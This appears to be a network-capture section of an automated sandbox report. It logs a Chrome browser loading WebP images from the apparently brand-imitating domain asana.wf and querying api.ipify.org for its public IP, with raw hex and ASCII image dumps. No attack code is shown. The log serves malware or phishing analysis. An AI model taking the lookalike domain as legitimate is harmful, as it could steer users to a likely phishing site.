                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7967INData Raw: 52 49 46 46 54 23 00 00 57 45 42 50 56 50 38 20 48 23 00 00 50 ec 00 9d 01 2a 30 02 75 01 3e 91 46 9f 4a 25 a4 23 21 a5 73 5a 40 b0 12 09 69 6e bb c2 4e 39 73 32 76 cb e3 bb b5 c5 12 d9 3d c2 cd b5 01 5d d6 d3 a1 fa 69 97 bf 5a f6 03 f2 85 f0 0f a8 77 4a cf 46 cf da 32 18 78 31 45 de c3 ea 7c 0a 66 89 13 b9 22 29 95 cd 75 be 6b 18 34 35 dc 36 1f dd 88 9e 9f 02 d8 e2 d9 4c 2c 85 49 4a a9 0f 42 f7 53 fa 98 f1 06 01 34 6e 47 18 05 08 ca 00 51 e5 73 97 ef 69 1f 4c e1 fe 8f 65 71 f0 73 f7 6d 52 4a 3b 88 8e cb 4e 2d b4 c6 37 9f 4d 15 75 22 7d 11 4e 36 1f e2 5b a3 66 6d 82 c3 77 c5 2e 76 8a 80 19 b6 74 1b 41 97 1b 35 5d d6 b7 00 28 bd 71 e9 81 7f 89 17 a5 64 d2 0a 8f 43 9e a1 66 4d 87 08 8c 82 e6 61 49 82 af 5a 6d c3 3d 3e cf cc 99 49 e6 33 b3 f4 67 7b 11 c7 5c
                                                                                                                                                                                                                    Data Ascii: RIFFT#WEBPVP8 H#P*0u>FJ%#!sZ@inN9s2v=]iZwJF2x1E|f")uk456L,IJBS4nGQsiLeqsmRJ;N-7Mu"}N6[fmw.vtA5](qdCfMaIZm=>I3g{\
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC1085INData Raw: cf 39 dc a9 9d 30 67 fc 87 fa 70 cd 48 86 ee fd 37 af 58 b1 7e 1a 04 6f b2 3a 53 10 78 16 85 c0 1c 7a 49 7e 37 82 19 17 45 5d f7 b6 bd 85 fa 43 2f 6e ac 1f 49 6d 28 39 d3 7b 64 fb d9 b1 f4 f1 f6 5d bc 2d 13 e8 0d 30 56 76 0a 23 00 cd ed d5 77 21 ef 9d 12 8a 84 a7 8b 2f 64 a1 7c 56 0b 82 48 ac dc 90 28 4d f1 5f 24 1c 72 3d ed 77 9c 3d 28 58 49 73 d7 e0 10 0c f6 bb c5 e2 70 ad 36 9d 4e 5c 13 04 1a f6 2e b9 74 7a d1 e0 9e d1 7e 33 8c ca fe d2 60 41 7a 82 a0 de 8c be de b1 a4 66 5b f3 49 65 6d d7 8e 79 e5 e7 27 d1 3b a1 a5 3a b6 49 31 6e 5c e0 85 8f 4a 18 aa 06 fe 69 28 f4 e3 ab e3 ea 22 d5 9c 65 5b 04 87 5b 79 aa 95 c2 ac 68 99 76 16 9b e6 8c 40 4b c9 23 3a 96 4f 3c 7c 6d e2 f7 18 51 ba cc e8 5b 07 0c d1 f5 08 52 c7 b6 70 ab 88 9b 31 a2 7c ac 4f 0a 1b eb 24
                                                                                                                                                                                                                    Data Ascii: 90gpH7X~o:SxzI~7E]C/nIm(9{d]-0Vv#w!/d|VH(M_$r=w=(XIsp6N\.tz~3`Azf[Iemy';:I1n\Ji("e[[yhv@K#:O<|mQ[Rp1|O$


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    29192.168.2.164973494.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC356OUTGET /img/home24-security.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "2f88-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 12168
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 80 2f 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 df 04 00 63 01 00 41 4c 50 48 6b 02 00 00 01 90 15 d9 b6 dd 46 27 0c 6e 18 08 82 c3 40 48 62 31 88 19 38 48 2c 23 b0 06 81 2e 82 91 19 d8 0c 62 06 e7 ce fb 79 3e f6 ad f3 b1 22 c2 8d db 46 92 44 63 a2 09 5b 7b ef 0b ec 97 2b d3 7c bd 37 39 f7 a8 f3 7e b0 80 eb c8 5e 84 ae 65 ac 4d d8 2d 63 0c fd d9 8b d6 b5 ec 6a 13 77 75 88 21 4f 7a 59 87 df 7a 6b 02 ef 18 44 9a f4 e2 bf a9 a5 cc 4d e2 2d 25 c6 17 47 79 d2 cb e5 57 b5 94 6b 13 79 d7 28 0f d0 34 e9 65 2b 3f 5b 9a cc 9b a3 48 93 5e 4e 3f 39 36 a1 77 08 22 4d 7a f1 c3 0f 86 26 f5 76 41 a4 49 2f be fb ae 6a ad 46 91 26 bd ac 66 36 36 b1 37 06 91 26 bd f8 68 b6 b4 d6 65 6f 40 d2 a4 97 d5 86 26 f7 a2 fc c7 21 4d 7a f1 32 e9 6d 8a 22 4b 7a
                                                                                                                                                                                                                    Data Ascii: RIFF/WEBPVP8XcALPHkF'n@Hb18H,#.by>"FDc[{+|79~^eM-cjwu!OzYzkDM-%GyWky(4e+?[H^N?96w"Mz&vAI/jF&f667&heo@&!Mz2m"Kz
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC4202INData Raw: 8c e5 01 48 4c 6d 0c 44 82 c8 18 a9 2b 0f 42 89 8b 4e c1 ab 78 be cb 48 73 5f 19 b7 03 29 ff 28 e0 11 88 02 91 32 36 f8 34 dd a5 cc 00 58 c3 3a 1f 79 49 e2 9e 52 5b 31 e9 4f 00 de e9 b7 b8 a5 d5 0c 62 ed 72 49 7c 65 87 98 7a 1a 0c 69 53 af ad 06 ed e7 57 23 46 90 6c 40 fe 03 23 ca 1a 9b dc 3f 83 65 b6 80 c6 6d b1 d9 8d d6 bc 99 d9 d4 91 53 4b ee 44 2c d1 ce cb 68 41 ea d1 ed 07 5e 84 81 7b d8 67 0b ef f7 7e be 8e c7 e8 c1 95 67 9c f8 0f 9e 2d 73 64 25 49 fb b9 73 43 d8 5c 2c b5 d1 60 41 7c d5 30 13 46 1c 0b b6 cb 7b c1 03 27 27 24 a5 e6 11 99 b5 35 6a 35 79 e3 39 08 50 43 99 73 04 27 6e 9b 15 e4 9b b5 c5 ac 02 df 78 9f 76 42 e2 8b 57 b2 83 27 da 81 ce 29 66 f9 f9 45 7e 3d 0e 82 61 0f dc 54 8c d6 a8 9b 4d 63 fc 57 22 49 75 b1 d4 95 fb bb 6c 10 f5 a9 7e 35
                                                                                                                                                                                                                    Data Ascii: HLmD+BNxHs_)(264X:yIR[1ObrI|eziSW#Fl@#?emSKD,hA^{g~g-sd%IsC\,`A|0F{''$5j5y9PCs'nxvBW')fE~=aTMcW"Iul~5


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    30192.168.2.164973694.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC591OUTGET /img/home24-demo-thumbnail.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "a108-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 41224
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 00 a1 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 2f 03 00 41 4c 50 48 cb 01 00 00 01 90 55 db b6 dd 36 07 82 21 5c 28 42 92 04 41 24 06 0a 92 b4 08 2c 06 32 03 9b c9 15 83 73 fb cc 3b 5f e7 63 46 c4 04 c4 4b 4f f3 8f db 31 ca e1 71 db ee 5b bc e9 74 19 85 71 9b 5e d7 2e a3 38 9e db 2b e6 63 94 c7 be bc 68 1d 15 32 d7 17 ac a3 46 e6 fa 9f 79 54 c9 5c fe d1 8e 32 31 7a fb 6b 1b 85 72 8f 88 69 54 ca 9c 22 2e a5 62 ec d1 46 ad cc d3 43 b5 58 b6 62 31 9e 6f d5 e2 7a 54 8b 3e aa 65 f2 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X//ALPHU6!\(BA$,2s;_cFKO1q[tq^.8+ch2FyT\21zkriT".bFCXb1ozT>e
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: a7 15 5b 24 ed e8 bd 13 bb 3f c4 56 f7 a7 79 3e 4b 35 29 d9 c1 f3 c0 a3 02 d0 68 ab a2 fc a4 47 9e 19 92 e4 3d 91 cf 46 5e 1d 8a 28 03 19 d3 2b 0d 9e ca 54 c5 64 9e e0 ce a8 b0 8e 69 1e 21 e6 7b 8d 13 80 3f 81 f8 e0 fb 62 0f d5 89 67 13 72 5f 66 07 34 8c 00 04 01 4c 52 28 d2 cf 73 9a b8 93 14 84 88 2f 3e 1a c5 e1 e3 6f c3 d3 fd 9b db 4d 7c 00 ea c4 26 be 34 5a ff 42 41 4d ef a5 65 6d 9d 9a ae 2c 9a 6f cf f4 7a 92 5b b1 d9 44 46 1b 68 5e 37 d2 da 12 79 8e f4 3c 85 28 a5 be da cb 1e 7e 14 99 58 11 ed 1c df 3b 44 1d e2 6b 44 78 b3 c0 26 a4 47 89 a0 a3 10 5b 22 ad cb a2 c3 c6 ae a3 41 f2 45 9f 2a f3 9f c5 10 a2 90 01 c3 7b 9b 84 23 d8 a5 b2 77 96 15 7d 2e 58 8a 3a 09 9e f5 ac df 59 b1 07 65 bd 32 df 85 7d 1e 6d 06 e4 6f 5f e6 41 d6 3d 00 96 d1 c2 f1 fa 7f 83
                                                                                                                                                                                                                    Data Ascii: [$?Vy>K5)hG=F^(+Tdi!{?bgr_f4LR(s/>oM|&4ZBAMem,oz[DFh^7y<(~X;DkDx&G["AE*{#w}.X:Ye2}mo_A=
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 4f 1c 68 37 cd 7d 1a 10 2d 4f 1c 24 85 4a f1 e3 83 4f 4c 84 af 0b 4c 07 eb bc ab 2e 37 c9 bf 33 f8 89 cf 1b c7 fe ad b6 32 63 46 7e 66 00 d9 65 3b 23 f4 b8 c7 2b 9c 87 50 73 9f 9a 5e 22 a5 bf bb f4 40 13 fa 18 a3 9c a9 54 b3 e0 9d 60 00 36 34 f0 56 20 88 e9 54 0d 00 ef 93 bd 52 35 ea 95 f0 e1 cb 8e e4 e9 54 3b 11 f6 dd 29 b7 02 d9 f2 fc da d6 de e0 c6 e1 b7 3a 28 a6 9a 77 60 0d ac a6 91 61 82 8e b5 1d 4a d8 62 ac 2e 99 2c 34 ae d1 80 77 e4 7d b5 d0 21 30 0a db 31 82 25 a2 bc f1 72 7c 09 1d 5c 79 44 35 aa b2 30 1d 43 30 17 48 3b a5 26 0e 40 ab 31 7a 3e 92 0e 57 67 12 1b 8f 5c 69 33 7a ba 73 bf 19 40 b5 b7 51 54 08 8b 9b 87 df cd 5a 45 67 0a eb eb f3 b9 4b 03 a8 47 4c e2 86 3e b4 53 c7 5f 7a 46 84 0b 6a 01 59 cb 9e e7 b1 57 f6 7d 19 34 43 1e c9 1b 5d 52 3d
                                                                                                                                                                                                                    Data Ascii: Oh7}-O$JOLL.732cF~fe;#+Ps^"@T`64V TR5T;):(w`aJb.,4w}!01%r|\yD50C0H;&@1z>Wg\i3zs@QTZEgKGL>S_zFjYW}4C]R=
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: d6 57 67 df 91 b1 74 04 60 f0 18 72 0d c8 23 85 62 9c bd 80 74 c3 66 28 f5 9c 7a 2d 42 ef c4 ac 79 89 7d 0e 89 a9 8d cc 08 39 ce 03 f2 3d 5a c3 f2 a8 4a dc cc 36 08 de e3 af 51 c5 61 a3 41 9d 23 1b 11 c0 b1 0c 39 d8 f9 d0 8a 2e d0 eb 88 e5 f7 65 6c 39 25 5b 2f 00 b4 5b 6b 01 41 af 25 be e7 f6 49 07 da a2 53 c9 8c ca 26 a7 bf 4e 81 a9 1a 2a de 5f be 8a f9 d1 79 26 ae 9d e2 47 c7 20 5b 39 a2 88 1e 21 a4 0c e7 cb e5 9c 7f cf 2c 5b 4d ef 4c 1d 6a 11 c8 f4 51 8a ff be c3 45 f1 b9 39 57 fa dd 73 1a d1 74 d6 71 29 e2 94 1f 01 b1 50 a0 63 8b c4 22 c9 c7 75 1a 31 d5 43 cb dd 22 f5 11 d4 ec 8f ab d6 68 97 10 f6 72 7a ce 39 a4 18 40 b2 3a e2 f0 c9 e3 96 b0 b8 b2 60 fa 94 85 06 58 c3 97 fe e3 9a d9 91 bf c1 91 46 12 8d ae 3f 3d 1f cc e1 4c 47 44 0c 1f a6 b3 bd 14 ef
                                                                                                                                                                                                                    Data Ascii: Wgt`r#btf(z-By}9=ZJ6QaA#9.el9%[/[kA%IS&N*_y&G [9!,[MLjQE9Wstq)Pc"u1C"hrz9@:`XF?=LGD
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 80 2f 5e b9 c4 e4 99 9a 26 47 e2 44 91 65 a3 b7 e2 82 2c 1c 7d 35 38 27 b0 13 32 12 69 cf e2 ae b9 19 68 74 9a ac 9c ac f1 ce 9c ea d1 8f f0 20 df 66 37 d5 b7 9b 6b 79 c7 01 9a b6 73 27 94 08 59 60 bc 4b 45 e9 68 53 e2 47 49 a9 54 26 cd be 47 a5 44 61 f0 ab 19 37 e1 b7 81 2d a0 2e 1a 7b b5 88 99 66 7d d6 3d 4f f2 39 ef 7b 6e d5 07 0e 10 ec 97 42 7b 03 3e d8 40 77 12 46 e0 dc 21 72 99 0b 5c 72 a4 5d 1a 27 03 9c 6d a5 f8 da f8 c5 c4 eb 0c 4e 57 3b 69 fe 4f b5 0b a0 b8 7e e8 a0 c7 e6 cd 0a b0 85 4f 4a ef 8b a1 42 f3 74 ff 7f 97 11 30 d8 c6 59 4c 36 ef fa 70 9e 6c 3a 82 a0 3d c4 d9 26 79 e5 da 1a 1f 62 f1 81 aa 8f 1d 4f 6a da 18 b5 bb 52 89 b9 a1 9c 27 c8 96 d1 4d 23 ec 2c 11 c8 53 a6 88 45 64 c8 a5 3e 06 12 9e 2f 82 7a b5 96 41 52 46 9d 09 06 4b ae 35 b8 8e
                                                                                                                                                                                                                    Data Ascii: /^&GDe,}58'2iht f7kys'Y`KEhSGIT&GDa7-.{f}=O9{nB{>@wF!r\r]'mNW;iO~OJBt0YL6pl:=&ybOjR'M#,SEd>/zARFK5
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC1258INData Raw: 4d a5 0c ac ed 99 58 7c 65 32 71 9c 6d 07 81 fa 85 d4 19 65 be 69 5b ad 3b ca c0 78 c5 f8 36 9f e2 bf 89 cd a2 6c 31 04 c9 a2 a5 07 2c 74 fa 5c ab 7e 94 27 ab 51 92 2e df 76 b1 83 d5 53 6b 7c 54 3f 70 20 ce 95 e2 dc 74 ce 27 55 07 ba 94 94 b1 68 2e b2 e9 55 5d 7b 35 16 48 88 3c bd 9b 4b 00 fe dc 8a 0a fd 75 18 a9 a3 01 f6 51 64 ec 68 d8 9a e8 85 99 d1 db a0 5c b8 b3 62 99 0f 0d 2e ed 5a 12 7b 75 f8 ad ac d9 40 7a 34 44 04 15 c4 59 19 29 86 4a 7a 4e ec e8 95 03 6c 5a 06 32 b5 91 fb 3a 03 0f 31 19 69 ed 60 18 98 27 d7 1f 9e e6 c7 28 f1 ef 74 36 41 cf 23 89 35 73 f6 b4 d6 2b 45 8e 0b 74 52 a9 1d 02 7c 10 85 c5 25 01 cd d7 cc 71 93 36 ae 24 24 32 c5 de 35 e6 20 05 c1 52 90 8f 9e 9f 2a 7d 72 cb 06 4e 19 da 0b 77 e2 9d 97 1c cc e7 e0 b5 f8 8f da 91 b5 bf 12 70
                                                                                                                                                                                                                    Data Ascii: MX|e2qmei[;x6l1,t\~'Q.vSk|T?p t'Uh.U]{5H<KuQdh\b.Z{u@z4DY)JzNlZ2:1i`'(t6A#5s+EtR|%q6$$25 R*}rNwp


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    31192.168.2.1649738104.26.13.2054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC349OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Content-Length: 23
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 87a0e3553d6b457c-ATL
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 7d
                                                                                                                                                                                                                    Data Ascii: {"ip":"185.152.66.230"}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    32192.168.2.164973794.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC353OUTGET /img/home24-ai-en.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "717a-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 29050
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 72 71 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 b9 05 00 61 03 00 41 4c 50 48 b0 02 00 00 01 80 50 db b6 d4 e6 49 f8 12 be 14 a4 e0 a0 38 28 0e c0 01 71 40 1d 44 02 12 be 84 2f 21 f3 20 e0 75 ed 88 98 80 f8 70 98 f6 d6 2f 29 79 3f f6 79 88 ef 97 df 7e 49 ce db 56 bf 53 96 4b 8a be d5 2f fc f4 4b 92 de c6 8f 96 4b a2 be bc 57 ce 97 54 fd 28 ef 1c 97 64 fd fc c6 72 49 d7 97 17 e3 25 61 9f 9e d4 96 b1 f5 f2 b0 5d 52 f6 25 22 ea 25 69 2f 11 5b d6 36 47 b4 ac ad c7 70 49 db 87 39 6f 9b f6 bc ed ef c8 db 5a cf db fa 85 ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9
                                                                                                                                                                                                                    Data Ascii: RIFFrqWEBPVP8XaALPHPI8(q@D/! up/)y?y~IVSK/KKWT(drI%a]R%"%i/[6GpI9oZ
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 42 3a 4e d4 08 aa b6 61 29 d1 9b a5 28 ca 50 53 03 cd bc 55 3e 38 a8 49 bb 01 99 0d 95 82 20 35 ed 64 02 e1 ad 25 94 9c e3 db c6 db a2 83 b5 56 e7 2c 90 c1 93 2f 9d f7 ac 0a 8c 78 e1 61 5a 14 46 16 83 f8 96 c6 01 c9 e9 6b ed c3 66 8c 61 79 5b da e5 81 7d ec 0a ca 80 2b a4 50 bd ff b4 1b 98 79 cb 6b d3 c5 2b a4 81 56 79 58 fe e6 33 db 5c 1d 0b 26 bc 88 a6 0f 6e ab df 0e 0c 6f 3b 1b 9b 42 e1 d2 e9 3f 96 a6 de 36 4e 47 5a 37 a5 07 8f d9 10 9e e3 b6 e4 63 10 1d 26 6d f7 2b 3f 9b 9d e6 b0 2a df d7 73 74 51 b3 f8 2a 98 85 10 60 c1 77 99 a2 78 ff ba ff b7 ed fe 56 4e 49 76 fd 8e 5c 4f 69 1a 21 61 0d 3d 45 0d f7 be 73 1a c6 55 df 69 7a cc 71 17 88 76 d9 ff f0 ba 17 a5 f2 9d ae 81 c3 b1 71 4a d0 2d 56 96 9b 80 91 57 da 52 94 5f 34 e4 9d 80 b3 0e 9d a3 a8 79 ed 42
                                                                                                                                                                                                                    Data Ascii: B:Na)(PSU>8I 5d%V,/xaZFkfay[}+Pyk+VyX3\&no;B?6NGZ7c&m+?*stQ*`wxVNIv\Oi!a=EsUizqvqJ-VWR_4yB
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: a3 19 cc 06 65 ba 85 b8 e3 bd 09 c5 13 a0 37 a2 31 81 de c1 55 20 37 90 3c 62 55 f3 ee 87 98 00 5d 6f 1d 4a 86 f7 52 5c ec 52 a8 ec 6b d5 97 12 01 a5 7a 89 bf 38 23 d4 d0 92 c0 8a b1 35 e7 26 d3 30 6d 07 0a 4a c2 b0 21 29 9c db a8 b0 80 32 eb 02 61 80 d3 7a 8a 13 f3 75 42 74 3f 72 d2 15 57 8a 0d 26 d7 ad 89 38 2b 13 b2 1e 69 d5 65 ff 4f 17 a6 6f 7a d3 fa 0c fe 22 ef 10 26 30 d9 7c 18 6b 79 2c 33 e2 ef 39 ed 1f 01 91 37 b9 6d f9 6d 35 22 33 d6 d4 14 38 80 5a 9b e2 8d f1 80 56 7b 30 3d 77 be e3 31 3c a5 8e cd 5d a7 be ce 6d 41 a4 b5 a3 2e 25 30 aa 54 31 81 12 05 d7 97 d9 62 72 de 14 ed 5c a6 3c 79 8c b9 aa fa f6 8e 82 48 f5 f7 af da eb 96 15 8e c2 f9 8d 1e a4 1c 99 6e c3 1a bb 1b f5 71 0f f3 06 db 70 ff c6 4b be 71 f5 41 d4 27 32 a7 f3 c2 24 73 bd 4d 56 63
                                                                                                                                                                                                                    Data Ascii: e71U 7<bU]oJR\Rkz8#5&0mJ!)2azuBt?rW&8+ieOoz"&0|ky,397mm5"38ZV{0=w1<]mA.%0T1br\<yHnqpKqA'2$sMVc
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC5084INData Raw: 82 d2 e6 fe 97 91 50 0a b2 46 61 a3 66 39 32 09 2e d3 aa 25 4f 6c ab ff 0f 1a 36 f3 e9 e7 53 a2 54 da d3 7f d0 19 6b 2d 04 e5 76 18 db fb 60 ab 5c 14 52 de 73 c5 fc 93 d6 4e b8 53 ef cc a4 8f a6 a0 ba 9f f3 7b 50 af 27 77 26 f4 73 a1 e5 7b 40 6f 6c 99 d5 e0 ae c6 c3 76 e9 af e6 10 2b 9a 66 8e 77 15 df 90 55 35 77 f8 d6 ed 42 6b 5d 9d b6 41 5c 6a 12 ce 74 6e 74 1d ba df 79 ed ba 4d 52 0f 10 bc 16 c9 94 e3 6b 03 41 cb 4f 6a cc 3c f2 18 13 18 00 6f 48 f2 8a fb 71 f8 60 0c 0c 0b ca 98 c4 1f ec 7a 52 59 a4 cf 02 bb e1 3f d0 fe d4 01 00 c7 d8 80 00 9c 6a 93 0e c7 17 8f 1c b8 c4 a5 a6 d6 63 b8 f6 02 04 3e 9d 9a 10 bc 65 ad 3d 82 7c ad c9 51 f1 69 1e c0 d8 43 3a f7 47 43 b4 a8 0f 9a fe 63 71 61 54 d2 6e 95 7a 00 ba 16 ef f8 1c e5 b2 eb 82 ef ae 10 35 9d 3e 0d 92
                                                                                                                                                                                                                    Data Ascii: PFaf92.%Ol6STk-v`\RsNS{P'w&s{@olv+fwU5wBk]A\jtntyMRkAOj<oHq`zRY?jc>e=|QiC:GCcqaTnz5>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    33192.168.2.164973994.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC596OUTGET /img/home24-resources-thumbnail.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
